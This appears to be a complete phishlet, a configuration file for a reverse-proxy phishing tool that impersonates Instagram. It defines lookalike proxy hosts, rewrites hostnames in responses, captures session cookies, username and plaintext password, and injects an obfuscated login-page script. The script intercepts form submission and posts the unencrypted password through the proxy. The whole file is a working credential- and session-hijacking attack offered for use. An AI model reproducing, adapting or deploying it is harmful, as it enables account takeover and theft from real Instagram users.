author: '@charlesbel'
min_ver: '2.3.0'

proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'instagram.com', session: true, is_landing: true}
  - {phish_sub: 'graphql', orig_sub: 'graphql', domain: 'instagram.com', session: false, is_landing: false}
  - {phish_sub: 'i', orig_sub: 'i', domain: 'instagram.com', session: false, is_landing: false}
  - {phish_sub: 'img', orig_sub: 'instagram.fcdg1-1.fna', domain: 'fbcdn.net', session: false, is_landing: false}
  - {phish_sub: 'static-cdn', orig_sub: 'static', domain: 'cdninstagram.com', session: false, is_landing: false}
  - {phish_sub: 'scontent-cdn', orig_sub: 'scontent', domain: 'cdninstagram.com', session: false, is_landing: false}

sub_filters:
  - {triggers_on: 'www.instagram.com', orig_sub: 'www', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.instagram.com', orig_sub: 'graphql', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.instagram.com', orig_sub: 'i', domain: 'instagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.instagram.com', orig_sub: 'static', domain: 'cdninstagram.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\/v\/)', replace: 'img.{domain}/v/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
  - {triggers_on: 'www.instagram.com', orig_sub: '', domain: 'fbcdn.net', search: '(instagram\.f[a-z]{3}[0-9]+-[0-9]+\.fna\.{domain_regexp}\\\/v\\\/)', replace: 'img.{domain}\\/v\\/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}

auth_tokens:
  - domain: '.instagram.com'
    keys: ['sessionid','.*,regexp']

credentials:
  username:
    key: 'username'
    search: '(.*)'
    type: 'post'
  password:
    key: 'unenc_password'
    search: '(.*)'
    type: 'post'

login:
  domain: 'www.instagram.com'
  path: '/accounts/login'

js_inject:
  - trigger_domains: ["www.instagram.com"]
    trigger_paths: ["/accounts/login"]
    trigger_params: []
    script: |
      // Copyright 2023 Charles Bel (@charlesbel)
      function _0x5928(){let $=["4fzfalm","applicatio","17796llAlJC","word=","rYiCB","61530gFNFMD","TepZH","stopPropag","rm-urlenco","1917125axaKdy","removeEven","sByName","FJKwx","OfYiZ","2453gAyuXN","POST","KHANK","/accounts/","NsFXJ","pFdrL","disconnect","fdfEy","ded","password","1917508hYiyhp","attributeN","lLQix","then","n/x-www-fo","ame","243417jlYAlf","ation","disabled","tListener","kATci","addEventLi","unenc_pass","kFTyR","querySelec","1148wcvVbJ","parentElem","2790eifhJI","e=submit]","getElement","body","tor","stener","login/ajax","nunrd","click","attributes","button[typ","nUsdj","value","ault","form[id=lo","ent","ZJHjF","Rhthp","preventDef","ginForm]","observe","forEach","Ljrkx","type","406082BhmWYm","target","1520mDrLJU"];return(_0x5928=function(){return $})()}const _0x5195dd=_0x1b55;!function($,x){let t=_0x1b55,e=$();for(;;)try{let n=parseInt(t(176))/1+parseInt(t(179))/2*(-parseInt(t(209))/3)+parseInt(t(203))/4+parseInt(t(188))/5+-parseInt(t(181))/6*(-parseInt(t(218))/7)+parseInt(t(178))/8*(parseInt(t(220))/9)+parseInt(t(184))/10*(-parseInt(t(193))/11);if(279811===n)break;e.push(e.shift())}catch(c){e.push(e.shift())}}(_0x5928,279811);const waitForEl=$=>{let x={KHANK:function($,x){return $(x)}};return new Promise(t=>{let e=_0x1b55,n={Rhthp:function($,t){let e=_0x1b55;return x[e(195)]($,t)}};if(document[e(217)+e(156)]($))return x[e(195)](t,document[e(217)+e(156)]($));let c=new MutationObserver(x=>{let d=e;document[d(217)+d(156)]($)&&(n[d(169)](t,document[d(217)+d(156)]($)),c[d(199)]())});c[e(172)](document[e(155)],{childList:!0,subtree:!0})})};function _0x1b55($,x){let t=_0x5928();return(_0x1b55=function($,x){return t[$-=153]})($,x)}waitForEl(_0x5195dd(166)+_0x5195dd(171))[_0x5195dd(206)](()=>{let $=_0x5195dd,x={pFdrL:$(202),kFTyR:function($,x,t){return $(x,t)},FJKwx:$(196)+$(158)+"/",nunrd:$(194),Ljrkx:$(180)+$(207)+$(187)+$(201),lLQix:function($,x){return $+x},OfYiZ:$(215)+$(182),NsFXJ:function($,x){return $(x)},TepZH:$(160),nUsdj:function($,x){return $==x},fdfEy:$(161),ZJHjF:function($,x){return $==x},rYiCB:$(211),kATci:$(162)+$(153)},t=document[$(217)+$(156)](x[$(213)]),e=t[$(219)+$(167)];async function n(c){let d=$;c[d(186)+d(210)](),c[d(170)+d(165)](),!t[d(211)]&&(await x[d(216)](fetch,x[d(191)],{method:x[d(159)],headers:{"Content-Type":x[d(174)]},body:x[d(205)](x[d(192)],x[d(197)](encodeURIComponent,document[d(154)+d(190)](x[d(198)])[0][d(164)]))}),e[d(189)+d(212)](x[d(185)],n,!0),c[d(177)][d(160)]())}e[$(214)+$(157)](x[$(185)],n,!0),new MutationObserver(function(t){let c=$;t[c(173)](function($){let t=c;x[t(163)]($[t(175)],x[t(200)])&&x[t(168)]($[t(204)+t(208)],x[t(183)])&&x[t(168)]($[t(177)][t(211)],!0)&&(e[t(189)+t(212)](x[t(185)],n,!0),e[t(214)+t(157)](x[t(185)],n,!0))})})[$(172)](document[$(217)+$(156)](x[$(213)]),{attributes:!0})});
